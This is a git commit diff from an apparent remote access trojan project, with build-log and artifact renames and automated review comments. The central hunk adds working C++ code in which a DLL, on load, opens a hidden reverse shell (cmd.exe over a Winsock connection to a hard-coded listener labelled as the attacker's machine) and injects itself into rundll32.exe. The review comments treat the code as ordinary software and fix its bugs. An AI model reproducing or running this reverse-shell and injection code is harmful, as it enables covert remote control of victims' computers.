Improved some stuff, cleaned some stuff. Now, after executing the loader, the DLL creates a reverse shell to a specified server.

hellisabove
2023-07-20 01:46:07 +03:00
parent 5a7024e1fa
commit eb9959e01e
53 changed files with 94 additions and 98 deletions
BIN
Binary file not shown.
-13
@@ -1,13 +0,0 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\dll.lib
c:\users\hellisabove\source\repos\rat\debug\dll.exp
c:\users\hellisabove\source\repos\rat\debug\dll.dll
c:\users\hellisabove\source\repos\rat\debug\dll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
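Review bot: generated build output is still tracked after this change. The `dll.tlog` file list deleted here is an MSBuild artifact, yet the sibling hunks in this commit only rename the same kind of paths (`vc141.pdb`, `*.obj`, `*.tlog`, `.lastbuildstate`, `*.log`) from `rat\` to `winapi-rat\` instead of untracking them. Add `Debug/`, `*.tlog`, `*.obj`, `*.pdb`, `*.ipdb`, `*.iobj`, `*.lastbuildstate` and `*.log` to a `.gitignore` and `git rm --cached` the rest; that is what turns a folder rename into "53 changed files" here.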
+4 -5
@@ -1,10 +1,9 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
fundll.cpp fundll.cpp
tools.cpp Creating library C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.exp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Generating code Generating code
c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value c:\users\hellisabove\source\repos\winapi-rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
c:\users\hellisabove\source\repos\winapi-rat\dll\fundll.cpp(44): warning C4700: uninitialized local variable 'dll_param' used
All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
Finished generating code Finished generating code
Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll Dll.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.dll
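Review bot: the committed Dll.log records two real compiler diagnostics, not noise: `warning C4715: 'Tools::AutoInject': not all control paths return a value` and `warning C4700: uninitialized local variable 'dll_param' used` at `fundll.cpp(44)`. Both are source defects and should be fixed before the log is refreshed. The log itself, with its machine-specific `C:\Users\hellisabove\...` paths and the MSB8051 notice that the `v141_xp` toolset is deprecated, is build output and belongs in `.gitignore` rather than in the repository.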
Binary file not shown.
-2
@@ -1,2 +0,0 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
Binary file not shown.
+16 -16
@@ -1,16 +1,16 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb c:\users\hellisabove\source\repos\winapi-rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj c:\users\hellisabove\source\repos\winapi-rat\dll\debug\tools.obj
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\fundll.lib c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.lib
c:\users\hellisabove\source\repos\rat\debug\fundll.exp c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.exp
c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.ipdb
c:\users\hellisabove\source\repos\rat\debug\fundll.iobj c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.iobj
c:\users\hellisabove\source\repos\rat\debug\fundll.dll c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.dll
c:\users\hellisabove\source\repos\rat\debug\fundll.pdb c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.write.1.tlog
Binary file not shown.
+1 -1
@@ -1,2 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0 #TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
Binary file not shown.
+42 -25
@@ -1,42 +1,59 @@
#include <winsock2.h>
#include <stdio.h>
#include "tools.h" #include "tools.h"
BOOL was_dllmain_called = FALSE; #pragma comment(lib, "ws2_32")
DWORD dll_param;
LPSTR target_path = "C:\\Windows\\System32\\conhost.exe"; int reverse(void) {
WSADATA wsaData;
SOCKET wSock;
struct sockaddr_in sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
// listener ip, port on attacker's machine
char* ip = "192.168.1.240";
short port = 4444;
// init socket lib
WSAStartup(MAKEWORD(2, 2), &wsaData);
// create socket
wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
sock.sin_addr.s_addr = inet_addr(ip);
// connect to remote host
WSAConnect(wSock, (SOCKADDR*)&sock, sizeof(sock), NULL, NULL, NULL, NULL);
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;
// start cmd.exe with redirected streams
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
exit(0);
}
extern "C" __declspec(dllexport) void FunEntry() { extern "C" __declspec(dllexport) void FunEntry() {
LPSTR target_path = "C:\\Windows\\System32\\rundll32.exe";
DWORD dll_param;
char dll_path[MAX_PATH]; char dll_path[MAX_PATH];
DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH); DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
char test[1024]; reverse();
wsprintfA(test, "%s", dll_path);
MessageBoxA(0, test, "", 0);
// inject dll
Tools::AutoInject(target_path, dll_path); Tools::AutoInject(target_path, dll_path);
} }
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) { BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
dll_param = (DWORD)Base;
was_dllmain_called = TRUE;
switch (Callback) { switch (Callback) {
case DLL_PROCESS_ATTACH: case DLL_PROCESS_ATTACH:
FunEntry();
break; case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH: case DLL_PROCESS_DETACH:
break; break;
} }
return TRUE; return TRUE;
}
extern "C" __declspec(dllexport) void MainBitch() {
if (was_dllmain_called) {
while (TRUE) {
char exe[MAX_PATH + 1];
GetModuleFileNameA(0, exe, sizeof(exe));
MessageBoxA(0, exe, "I am inside: ", 0);
}
} else {
MessageBoxA(NULL, "DLLMain was not called", NULL, 0);
}
} }
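Review bot: `reverse()` ends in `exit(0)` and `FunEntry()` is now invoked from `DLL_PROCESS_ATTACH`, so the loading process terminates inside `DllMain` and the `Tools::AutoInject(target_path, dll_path);` line after the `reverse();` call is unreachable dead code. Separately, `dll_param` became an uninitialized local in `FunEntry` (the `dll_param = (DWORD)Base;` assignment in `DllMain` was removed in this hunk), so the `GetModuleFileNameA((HINSTANCE)dll_param, ...)` argument is indeterminate; this is exactly the C4700 warning recorded in the committed Dll.log. On documentation: the commit message says "a specified server", but `ip` and `port` are hard-coded constants (`192.168.1.240`, `4444`) with nothing that sets them; either document where they are meant to be configured or correct the message.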
-1
@@ -1,5 +1,4 @@
#include <Windows.h> #include <Windows.h>
#pragma once #pragma once
namespace Tools { namespace Tools {
+13 -13
@@ -1,13 +1,13 @@
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.pdb c:\users\hellisabove\source\repos\winapi-rat\injector\debug\vc143.pdb
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.idb c:\users\hellisabove\source\repos\winapi-rat\injector\debug\vc143.idb
c:\users\hellisabove\source\repos\rat\injector\debug\injector.obj c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.obj
c:\users\hellisabove\source\repos\rat\injector\debug\injector.ilk c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.ilk
c:\users\hellisabove\source\repos\rat\debug\injector.exe c:\users\hellisabove\source\repos\winapi-rat\debug\injector.exe
c:\users\hellisabove\source\repos\rat\debug\injector.pdb c:\users\hellisabove\source\repos\winapi-rat\debug\injector.pdb
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.items.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.items.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.write.1.tlog
+1 -1
@@ -2,7 +2,7 @@
<Project> <Project>
<ProjectOutputs> <ProjectOutputs>
<ProjectOutput> <ProjectOutput>
<FullPath>C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe</FullPath> <FullPath>C:\Users\hellisabove\source\repos\winapi-rat\Debug\Injector.exe</FullPath>
</ProjectOutput> </ProjectOutput>
</ProjectOutputs> </ProjectOutputs>
<ContentFiles /> <ContentFiles />
Binary file not shown.
+1 -1
@@ -1,2 +1,2 @@
injector.cpp injector.cpp
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe Injector.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\Injector.exe
Binary file not shown.
+1 -1
@@ -1 +1 @@
C:\Users\hellisabove\source\repos\RAT\Injector\injector.cpp;C:\Users\hellisabove\source\repos\RAT\Injector\Debug\injector.obj C:\Users\hellisabove\source\repos\winapi-rat\Injector\injector.cpp;C:\Users\hellisabove\source\repos\winapi-rat\Injector\Debug\injector.obj
@@ -1,2 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0: PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0:
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
Binary file not shown.
+1 -1
@@ -78,5 +78,5 @@ INT main(INT arg, PCHAR argv[]) {
CloseHandle(x_file); CloseHandle(x_file);
} }
else else
printf("\nUSE: %s section name target dll\n",argv[0]); printf("\nUSE: %s 'section name' target dll\n",argv[0]);
} }
+11 -11
@@ -1,11 +1,11 @@
c:\users\hellisabove\source\repos\rat\loader\debug\vc141.pdb c:\users\hellisabove\source\repos\winapi-rat\loader\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\loader\debug\tools.obj c:\users\hellisabove\source\repos\winapi-rat\loader\debug\tools.obj
c:\users\hellisabove\source\repos\rat\loader\debug\loader.obj c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.obj
c:\users\hellisabove\source\repos\rat\debug\loader.exe c:\users\hellisabove\source\repos\winapi-rat\debug\loader.exe
c:\users\hellisabove\source\repos\rat\debug\loader.pdb c:\users\hellisabove\source\repos\winapi-rat\debug\loader.pdb
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.write.1.tlog
+1 -5
@@ -1,6 +1,2 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
cl : Command line warning D9025: overriding '/sdl-' with '/GS-' Loader.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\Loader.exe
loader.cpp
tools.cpp
Generating Code...
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
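Review bot: the old Loader.log shows `cl : Command line warning D9025: overriding '/sdl-' with '/GS-'`, meaning the loader was built with buffer security checks (`/GS`) and SDL checks disabled. The refreshed log drops that line, but no `Loader.vcxproj` change appears in this diff, so confirm whether `/GS-` is still set rather than relying on the log. As with Dll.log, a build log containing absolute `C:\Users\hellisabove\...` paths should not be tracked.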
Binary file not shown.
@@ -1,2 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0 #TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
Binary file not shown.